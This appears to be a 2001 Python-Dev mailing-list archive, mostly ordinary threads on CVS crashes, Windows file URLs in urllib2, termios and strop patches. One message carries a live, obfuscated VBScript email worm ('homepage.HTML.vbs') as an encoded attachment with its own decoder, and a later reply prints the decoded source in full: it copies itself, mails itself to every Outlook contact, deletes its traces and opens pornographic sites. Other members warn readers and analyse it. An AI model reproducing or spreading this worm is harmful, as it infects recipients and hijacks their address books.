Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree, even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson@baltimore.com  Wed May  9 16:49:29 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C0D89F.A3FFB8BE
Content-Type: text/plain


Hi!

You've got to see this page! It's really cool ;O)


------_=_NextPart_000_01C0D89F.A3FFB8BE
Content-Type: application/octet-stream;
	name="homepage.HTML.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="homepage.HTML.vbs"

Execute =
DeCode("Qp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11YU=11?=11EtgcvgQdlgev*$YUe=
tkrv0Ujgnn$+=10=0FUgv=11HUQ?=11Etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$=
+=10=0FHqnfgt?HUQ0IgvUrgekcnHqnfgt*4+=10=0F=10=0FUgv=11KpH?HUQ0QrgpVgzvH=
kng*YUetkrv0UetkrvHwnnpcog.3+=10=0FFq=11Yjkng=11KpH0CvGpfQhUvtgco>@Vtwg=10=
=0FUetkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnh=10=0FNqqr=10=0F=10=0FUg=
v=11QwvH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+=10=0FQwvH0=
ytkvg=11UetkrvDwhhgt=10=0FQwvH0enqug=10=0FUgv=11HUQ?Pqvjkpi=10=0F=10=0FK=
h=11YU0tgitgcf=11*$JMEW^uqhvyctg^Cp^ockngf$+=11>@=11$3$=11vjgp=10=0FOckn=
kv*+=10=0FGpf=11Kh=10=0F=10=0FUgv=11u?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$=
+=10=0FUgv=11v?u0IgvPcogUrceg*$OCRK$+=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*8+=
=10=0FHqt=11k?3=11vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$=
Jqogrcig$=11Vjgp=10=0Fw0Kvgou0Kvgo*k+0enqug=10=0Fw0Kvgou0Kvgo*k+0fgngvg=10=
=0FGpf=11Kh=10=0FPgzv=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*5+=10=0FHqt=11k?3=11=
vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$=11Vjgp=10=
=0Fw0Kvgou0Kvgo*k+0fgngvg=10=0FGpf=11Kh=10=0FPgzv=10=0F=10=0FTcpfqok|g=10=
=0Ft?Kpv**6,Tpf+-3+=10=0FKh=11t?3=11vjgp=10=0FYU0Twp*$jvvr<11jctfeqtg0rq=
tpdknndqctf0pgv1ujcppqp130jvo$+=10=0Fgnugkh=11t?4=11Vjgp=10=0FYU0Twp*$jv=
vr<11ogodgtu0pdek0eqo1aZOEO1rtkp|lg130jvo$+=10=0Fgnugkh=11t?5=11Vjgp=10=0F=
YU0Twp*$jvvr<11yyy40ugzetqrqnku0eqo1cocvgwt1ujgknc130jvo$+=10=0FGnugKh=11=
t?6=11Vjgp=10=0FYU0Twp*$jvvr<11ujgknc0kuugz{0vx130jvo$+=10=0FGpf=11Kh=10=
=0F=10=0FHwpevkqp=11Ocknkv*+=10=0FQp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11=
Qwvnqqm=11?=11EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+=10=0FKh=11Qwvnqqm=11?=11=
$Qwvnqqm$=11Vjgp=10=0F=12Ugv=11Ocrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+=10=0F=12=
Ugv=11Nkuvu?Ocrk0CfftguuNkuvu=10=0F=12Hqt=11Gcej=11NkuvKpfgz=11Kp=11Nkuv=
u=10=0F=12=12Kh=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=11>@=112=11Vjgp=10=0F=12=
=12=12EqpvcevEqwpv=11?=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=10=0F=12=12=12Hq=
t=11Eqwpv?=113=11Vq=11EqpvcevEqwpv=10=0F=12=12=12=12Ugv=11Ockn=11?=11Qwv=
nqqm0EtgcvgKvgo*2+=10=0F=12=12=12=12Ugv=11Eqpvcev=11?=11NkuvKpfgz0Cfftgu=
uGpvtkgu*Eqwpv+=10=0F=12=12=12=12Ockn0Vq=11?=11Eqpvcev0Cfftguu=10=0F=12=12=
=12=12Ockn0Uwdlgev=11?=11$Jqogrcig$=10=0F=12=12=12=12Ockn0Dqf{=11?=11xde=
tnh($Jk#$(xdetnh(xdetnh($[qw)xg=11iqv=11vq=11ugg=11vjku=11rcig#=11Kv)u=11=
tgcnn{=11eqqn=11=3DQ+$(xdetnh(xdetnh=10=0F=12=12=12=12Ugv=11Cvvcejogpv?O=
ckn0Cvvcejogpvu=10=0F=12=12=12=12Cvvcejogpv0Cff=11Hqnfgt=11(=11$^jqogrci=
g0JVON0xdu$=10=0F=12=12=12=12Ockn0FgngvgChvgtUwdokv=11?=11Vtwg=10=0F=12=12=
=12=12Kh=11Ockn0Vq=11>@=11$$=11Vjgp=10=0F=12=12=12=12Ockn0Ugpf=10=0F=12=12=
=12=12YU0tgiytkvg=11$JMEW^uqhvyctg^Cp^ockngf$.=11$3$=10=0F=12=12=12Gpf=11=
Kh=10=0F=12=12=12Pgzv=10=0F=12=12Gpf=11Kh=10=0F=12Pgzv=10=0FGpf=11kh=10=0F=
Gpf=11Hwpevkqp")
Function DeCode(Coded)
For I =3D 1 To Len(Coded)
CurChar=3D Mid(Coded, I, 1)
If Asc(CurChar) =3D 15 Then
CurChar=3D Chr(10)
ElseIf Asc(CurChar) =3D 16 Then
CurChar=3D Chr(13)
ElseIf Asc(CurChar) =3D 17 Then
CurChar=3D Chr(32)
ElseIf Asc(CurChar) =3D 18 Then
CurChar=3D Chr(9)
Else
CurChar =3D Chr(Asc(CurChar) - 2)
End If
DeCode =3D DeCode & CurChar
Next
End Function


------_=_NextPart_000_01C0D89F.A3FFB8BE--


From guido@digicool.com  Wed May  9 18:08:22 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
 <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@pythonware.com  Wed May  9 17:12:00 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr@thyrsus.com  Wed May  9 17:20:24 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido@digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake@cj42289-a.reston1.va.home.com  Wed May  9 17:21:27 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry@digicool.com  Wed May  9 17:23:26 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
 <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake@cj42289-a.reston1.va.home.com  Wed May  9 17:47:27 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From Samuele Pedroni <pedroni@inf.ethz.ch>  Wed May  9 18:12:20 2001
From: Samuele Pedroni <pedroni@inf.ethz.ch> (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability: when I was younger
(and I'm not that old), a bad guy had to use assembler to cause
some damage; now, thanks to MS, which doesn't care much about security
but likely cares a lot about self-confidence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one@home.com  Wed May  9 18:47:22 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising you to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson@baltimore.com  Wed May  9 19:50:25 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one@home.com  Wed May  9 20:30:41 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urllib2 takes > 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory:
     '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'
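The second traceback shows the leading slash of the URL path surviving into the filename ('\\c:\\...'). For comparison, the conventional URL for an absolute drive-letter path uses three slashes and forward slashes throughout (present-day pathlib's `as_uri()` produces this form). The sketch below spells that construction out by hand; `windows_path_to_file_url` is a hypothetical helper, and UNC paths are deliberately not handled:

```python
from pathlib import PureWindowsPath
from urllib.parse import quote


def windows_path_to_file_url(path):
    """Build a file URL for an absolute drive-letter path such as c:/dir/file.

    Hypothetical helper for illustration; UNC paths are rejected.
    """
    p = PureWindowsPath(path)  # a "pure" path, so this runs on any OS
    if len(p.drive) != 2 or not p.root:
        raise ValueError("expected an absolute drive-letter path: %r" % (path,))
    # parts[0] is the anchor (e.g. 'c:\\'); percent-quote the other components
    rest = "/".join(quote(part) for part in p.parts[1:])
    return "file:///%s/%s" % (p.drive, rest)


print(windows_path_to_file_url(r"c:\code\python\dist\src\lib\urllib2.pyc"))
# file:///c:/code/python/dist/src/lib/urllib2.pyc
```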

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.


From mwh@python.net  Wed May  9 20:50:34 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake@users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake@acm.org  Wed May  9 21:09:09 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
 <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.
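To make "does the right thing" concrete, here is a rough Python model of the checks PyObject_AsFileDescriptor() performs in present-day CPython: an int is used directly, otherwise the object's fileno() is called, and a negative result is rejected in one place. The function name and the exact messages are illustrative assumptions, not the C API itself:

```python
def as_file_descriptor(obj):
    """Rough Python model of PyObject_AsFileDescriptor() (hypothetical name)."""
    if isinstance(obj, int):
        fd = obj  # an int is taken at face value
    elif hasattr(obj, "fileno"):
        fd = obj.fileno()  # otherwise ask the object for its descriptor
        if not isinstance(fd, int):
            raise TypeError("fileno() returned a non-integer")
    else:
        raise TypeError("argument must be an int, or have a fileno() method.")
    if fd < 0:
        # The single negative-number check that makes a caller-side
        # PyInt_Check() special case unnecessary.
        raise ValueError("file descriptor cannot be a negative integer (%i)" % fd)
    return fd
```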


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh@python.net  Wed May  9 21:13:46 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use in tomorrow's
python-dev summary?
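For comparison only: in present-day Python 3, encode() returns bytes and decode() is a method of bytes, so the round trip Michael tried behaves as one would expect, while encoding the same character to ASCII still fails with the familiar "ordinal not in range(128)" reason. This does not describe the 2001 patch under discussion:

```python
# Present-day Python 3: str.encode() gives bytes; bytes.decode() gives str.
encoded = '\u00e3'.encode('latin-1')
decoded = encoded.decode('latin-1')
print(repr(encoded), repr(decoded))  # b'\xe3' 'ã'

try:
    '\u00e3'.encode('ascii')
except UnicodeEncodeError as exc:
    print(exc.reason)  # ordinal not in range(128)
```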

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh@python.net  Wed May  9 21:18:47 2001
From: mwh@python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

So it was!  I must have uploaded a slightly stale version of the
patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp@ActiveState.com  Wed May  9 21:48:38 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.
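The three steps above can be sketched in Python as follows. This is a heuristic that mimics the lenient behaviour Paul describes, not a standards-conforming file-URL parser, and `lenient_file_url_to_path` is a hypothetical name. The drive-letter form is tried first because a string like "//c:/temp" would otherwise be mistaken for a UNC path with host "c:":

```python
import re

# (/*)x:/path : any number of leading slashes, then a drive letter
_DRIVE_FORM = re.compile(r"^/*([A-Za-z]):/(.*)$")
# //machine/path : exactly two leading slashes, then a host name
_UNC_FORM = re.compile(r"^//([^/]+)/(.*)$")


def lenient_file_url_to_path(url):
    """Map an IE-style 'file:' URL (or a bare path) to a Windows path."""
    s = url.replace("\\", "/")  # 1. normalize to forward slashes
    if s[:5].lower() == "file:":
        s = s[5:]  # 2. remove "file:"
    m = _DRIVE_FORM.match(s)  # 3a. drive-letter form, checked first
    if m:
        drive, rest = m.groups()
        return drive + ":\\" + rest.replace("/", "\\")
    m = _UNC_FORM.match(s)  # 3b. UNC form
    if m:
        host, rest = m.groups()
        return "\\\\" + host + "\\" + rest.replace("/", "\\")
    raise ValueError("unrecognized file URL: %r" % (url,))
```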

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik@effbot.org  Thu May 10 00:19:40 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim@digicool.com  Thu May 10 00:39:08 2001
From: tim@digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that mustn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one@home.com  Thu May 10 00:46:13 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor@tbe.com  Thu May 10 01:16:28 2001
From: mike.mellor@tbe.com (mike.mellor@tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Python 2.1
installed).  While I can run command line programs, Tkinter is not 
